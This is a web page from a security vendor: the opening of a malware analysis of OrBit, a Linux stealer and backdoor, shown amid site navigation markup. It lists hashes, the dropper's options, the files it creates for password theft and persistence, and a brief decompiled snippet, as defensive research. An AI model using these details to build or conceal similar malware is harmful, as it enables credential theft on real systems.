ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/endpoint-protection/terminals-security/"><span class="ubermenu-target-title ubermenu-target-text">Protection for terminals</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232476 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/endpoint-protection/server-security/"><span class="ubermenu-target-title ubermenu-target-text">Protection for servers</span></a></li></ul></li><!-- end Segment: 2013 --><!-- begin Segment: Menu ID 2012 --><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-232145 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-clear-row ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/data-protection/"><span class="ubermenu-target-title ubermenu-target-text">Data security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-232145 ubermenu-submenu-type-auto ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316125 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-google-workspace/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in Google Workspace</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316126 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-gmail/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in Gmail</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316127 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-outlook/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in Outlook</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316128 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-microsoft365/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in SharePoint and OneDrive</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316129 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-on-workstations/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption on workstations</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316130 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/sds-range/"><span class="ubermenu-target-title ubermenu-target-text">SDS range</span></a></li></ul></li><!-- end Segment: 2012 --><!-- begin Segment: Menu ID 6853 --><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-238837 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/operational-protection/"><span class="ubermenu-target-title ubermenu-target-text">Operational security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-238837 ubermenu-submenu-type-auto ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-238836 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/operational-protection/our-features-ot/"><span class="ubermenu-target-title ubermenu-target-text">Features</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-238838 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/operational-protection/our-range-ot/"><span class="ubermenu-target-title ubermenu-target-text">Product range</span></a></li></ul></li><!-- end Segment: 6853 --><li class="ubermenu-divider"><hr/></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-20992 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/buy-a-solution/"><span class="ubermenu-target-title ubermenu-target-text">Buy a solution</span></a></li></ul></li><!-- end Tabs: [Tabs] 22834 --><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-232688 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Our support</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-232688 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"  ><!-- begin Tabs: [Tabs] 238873 --><li class="ubermenu-item ubermenu-tabs ubermenu-item-238873 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul  class="ubermenu-tabs-group ubermenu-tabs-group--trigger-mouseover ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-238873 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"  ><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232690 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/with-our-partners/"><span class="ubermenu-target-title ubermenu-target-text">With our partners</span></a></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-20993 ubermenu-item-header ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/"><span class="ubermenu-target-title ubermenu-target-text">Services</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-20993 ubermenu-submenu-type-tab-content-panel"  ><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23008 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23008"><ul  class="ubermenu-submenu ubermenu-submenu-id-23008 ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232692 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/maintenance/"><span class="ubermenu-target-title ubermenu-target-text">Maintenance</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232694 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/technical-support/"><span class="ubermenu-target-title ubermenu-target-text">Technical Support</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232693 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/training/"><span class="ubermenu-target-title ubermenu-target-text">Training</span></a></li></ul></li><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23009 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23009"><ul  class="ubermenu-submenu ubermenu-submenu-id-23009 ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232687 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/professional-services/"><span class="ubermenu-target-title ubermenu-target-text">Professional Services</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232686 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/cyber-threat-intelligence/"><span class="ubermenu-target-title ubermenu-target-text">Threat Intelligence</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232689 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/stormshield-academy/"><span class="ubermenu-target-title ubermenu-target-text">Stormshield Academy</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-149000 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/resource-center/"><span class="ubermenu-target-title ubermenu-target-text">Marketing documentation</span></a></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-149001 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://documentation.stormshield.eu/HOME/Content/Website_Topics/Root-HomePage-EN.htm"><span class="ubermenu-target-title ubermenu-target-text">Technical documentation</span></a></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-232691 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/tag/cybersecurity-first-steps/"><span class="ubermenu-target-title ubermenu-target-text">Cybersecurity, first steps</span></a></li></ul></li><!-- end Tabs: [Tabs] 238873 --><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-156 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-flyout" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Partner</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-156 ubermenu-submenu-type-flyout ubermenu-submenu-drop ubermenu-submenu-align-left_edge_item"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-35603 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/"><span class="ubermenu-target-title ubermenu-target-text">Why become a partner</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-22113 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/apply-for-a-partnership/"><span class="ubermenu-target-title ubermenu-target-text">Join our network</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-22116 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/partner-finder/"><span class="ubermenu-target-title ubermenu-target-text">All our partners</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232827 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/supporting-your-customers/"><span class="ubermenu-target-title ubermenu-target-text">Supporting your customers</span></a></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-159 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-flyout" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/news/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">News</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-159 ubermenu-submenu-type-flyout ubermenu-submenu-drop ubermenu-submenu-align-left_edge_item"  ><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-235880 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/tag/cybersecurity-by-stormshield/"><span class="ubermenu-target-title ubermenu-target-text">Cybersecurity, by Stormshield</span></a></li><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-235879 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/tag/cybersecurity-first-steps/"><span class="ubermenu-target-title ubermenu-target-text">Cybersecurity, first steps</span></a></li><li class="ubermenu-divider"><hr/></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21096 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/corporate/"><span class="ubermenu-target-title ubermenu-target-text">Corporate</span></a></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21101 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/recruitment-news/"><span class="ubermenu-target-title ubermenu-target-text">Recruitment news</span></a></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21099 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/partner-news/"><span class="ubermenu-target-title ubermenu-target-text">Partner news</span></a></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21100 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/products-services/"><span class="ubermenu-target-title ubermenu-target-text">Products &amp; Services</span></a></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21095 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/alert/"><span class="ubermenu-target-title ubermenu-target-text">Alert</span></a></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21102 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/security-monitoring/"><span class="ubermenu-target-title ubermenu-target-text">Security Monitoring</span></a></li><li class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21098 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/opinion-articles/"><span class="ubermenu-target-title ubermenu-target-text">Opinion articles</span></a></li><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-278650 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/thisissecurity/"><span class="ubermenu-target-title ubermenu-target-text">Technical posts</span></a></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li></ul></nav>
<!-- End UberMenu -->
</nav>																				</div>
					</div>
									</div>
			</div>
		</div>
</header>	<a id="back_to_top" href="#">
        <span class="fa-stack">
            <i class="qode_icon_font_awesome fa fa-arrow-up " ></i>        </span>
	</a>
	
	
    
    	
    
    <div class="content content_top_margin">
        <div class="content_inner  ">
                	<div class="title_outer title_without_animation"    data-height="30">
		<div class="title title_size_small  position_right " style="height:30px;background-color:#ffffff;">
			<div class="image not_responsive"></div>
										<div class="title_holder"  style="padding-top:0;height:30px;">
					<div class="container">
						<div class="container_inner clearfix">
								<div class="title_subtitle_holder" >
                                                                																		<h1 ><span>OrBit: advanced analysis of a Linux dedicated malware</span></h1>
																	
																												<div class="breadcrumb" > <div class="breadcrumbs"><div itemprop="breadcrumb" class="breadcrumbs_inner"><a href="https://www.stormshield.com/">Home</a><span class="delimiter">&nbsp;>&nbsp;</span><a href="https://www.stormshield.com/category/thisissecurity/">Technical posts</a> <span class="delimiter">&nbsp;>&nbsp;</span><span class="current">OrBit: advanced analysis of a Linux dedicated malware</span></div></div></div>
																	                                                            </div>
						</div>
					</div>
				</div>
								</div>
			</div>

    <div class="scroolcompteur">
        <div class="container actus_sommaire">
            <div class="container_inner default_template_holder clearfix page_container_inner">
                <div class="two_columns_75_25 background_color_sidebar grid2 clearfix">


                    <div class="column2">
                        <div class="column_inner">
                            <aside class="sidebar">
                                <div class="widget qode-widget-sticky-sidebar"></div>

                                <p><strong>Summary</strong></p>
                                <ol class="sub-menu-actus-sommaire"></ol>

                            </aside>
                        </div>
                    </div>

                    <div class="column1">
                        <div class="column_inner">
                            <div class="post_info">
                                <h1>OrBit: advanced analysis of a Linux dedicated malware</h1>
                                <p class="news-date">Published on: 02 01 2023                                                                        |
                                    Modified on: 06 01 2023</p>
                                

                                <p class="news-author">Author: <a href="https://www.stormshield.com/author/louis-deschanel/">Louis Deschanel</a></p>
                                <p class="news-author text-right"><i class="fas fa-stopwatch"></i> <span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 14</span> <span class="rt-label rt-postfix">minutes</span></span></p>
                            </div>

                            <div class="post_text">
                                <div class="post_text_inner">
                                    <section class="wpb-content-wrapper"><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p><strong>Orbit is a two-stage malware that appeared in July 2022, discovered by Intezer lab. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.</strong></p>
<p>In July 2022, Intezer's research teams published <a href="https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat" target="_blank" rel="noopener">the first paper</a> on the OrBit malware, with an evocative title: '<em>New Undetected Linux Threat Uses Unique Hijack of Execution Flow</em>'. This paper has the modest intention of completing this analysis of the malware.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h2>The OrBit dropper</h2>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

<div class="qode-advanced-pricing-table">
	<div class="qode-apt-header qode-apt-row">
		<div class="qode-apt-title-holder">
			<h5 class="qode-apt-title">
							</h5>
		</div>
		<div class="qode-apt-column-title-holder">
			<h5 class="qode-apt-title">
							</h5>
		</div>
	</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Type			</div>
			<div class="qode-apt-item-price">
				$ELF			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Architecture			</div>
			<div class="qode-apt-item-price">
				$x86-64			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Obfuscation			</div>
			<div class="qode-apt-item-price">
				$No			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Debugging information				</div>
			<div class="qode-apt-item-price">
				$Yes			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Required privileges				</div>
			<div class="qode-apt-item-price">
				$root (fails without superadmin rights)			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				SHA-256			</div>
			<div class="qode-apt-item-price">
				$f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				MD5			</div>
			<div class="qode-apt-item-price">
				$67048a69a007c37f8be5d01a95f6a026			</div>
		</div>
			</div>	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>The goal of the dropper is to install a shared library on the target system.</p>
<p>Several command line arguments are supported:</p>
<ul>
<li>Without argument, the malware is installed in the directory <em><code>/lib/libntpVnQE6mk/</code></em></li>
<li><em><strong>sh</strong></em> installs the malware in <em><code>/dev/shm/ldx</code></em></li>
<li><em><strong>shred </strong></em>removes the malware</li>
<li><em><strong>newpath </strong></em>modify the linker to write the path passed in parameter</li>
<li><em><strong>mov</strong></em> installs the malicious library in the chosen directory with name passed in parameter<s><br />
</s></li>
<li><em><strong>-O</strong></em> ignore the version of the binary <strong>ld.so</strong> during installation</li>
<li><em><strong>-o</strong></em> allows to rewrite the path written in the linker by <em><code>/dev/shm/ldx/.l</code></em><s><br />
</s></li>
<li><em><strong>-u</strong></em> reinstalls the malware</li>
</ul>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Files created</h3>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

<div class="qode-advanced-pricing-table">
	<div class="qode-apt-header qode-apt-row">
		<div class="qode-apt-title-holder">
			<h5 class="qode-apt-title">
							</h5>
		</div>
		<div class="qode-apt-column-title-holder">
			<h5 class="qode-apt-title">
				Utility			</h5>
		</div>
	</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.backup_ld.so			</div>
			<div class="qode-apt-item-price">
				$linker backup 			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				libdl.so			</div>
			<div class="qode-apt-item-price">
				$malicious shared library			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.l			</div>
			<div class="qode-apt-item-price">
				$contains the path to the malicious library			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.profile			</div>
			<div class="qode-apt-item-price">
				$script to be installed in a home directory			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.bashrc			</div>
			<div class="qode-apt-item-price">
				$symbolic link to .profile			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				escalator			</div>
			<div class="qode-apt-item-price">
				$privilege elevation script			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.bootsh			</div>
			<div class="qode-apt-item-price">
				$file to execute when the cron daemon is activated			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.logpam			</div>
			<div class="qode-apt-item-price">
				$indicates whether ssh passwords should be saved			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				sshpass.txt			</div>
			<div class="qode-apt-item-price">
				$PAM password list			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				sshpass2.txt			</div>
			<div class="qode-apt-item-price">
				$sudo or ssh password list			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				.ports			</div>
			<div class="qode-apt-item-price">
				$list of ports to filter in TCP			</div>
		</div>
			</div>	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Persistent installation</h3>
<h4>Entry point of the malware</h4>
<p>The <strong><code>main</code></strong> function vérifie checks for the presence of the directory <em><code>/lib/libntpVnQE6mk</code></em>, this will eventually contain all the files and subdirectories needed for the malware to work effectively, its absence means that the malware is not yet present.</p>
<p>Once the directory is created, the program changes the owner group ID to <strong>920366</strong>.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre>/* main() - Creation of the directory */
if (stat("/lib/libntpVnQE6mk", ...) {
   puts("new hdd"); 
   system("mkdir /lib/libntpVnQE6mk");
   chown("/lib/libntpVnQE6mk", 0, 920366);
   backup_ld(); 
}</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>This identifier is very unlikely to belong to a group already present on the system and is used by the malware to differentiate malicious directories, files and processes from normal ones.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
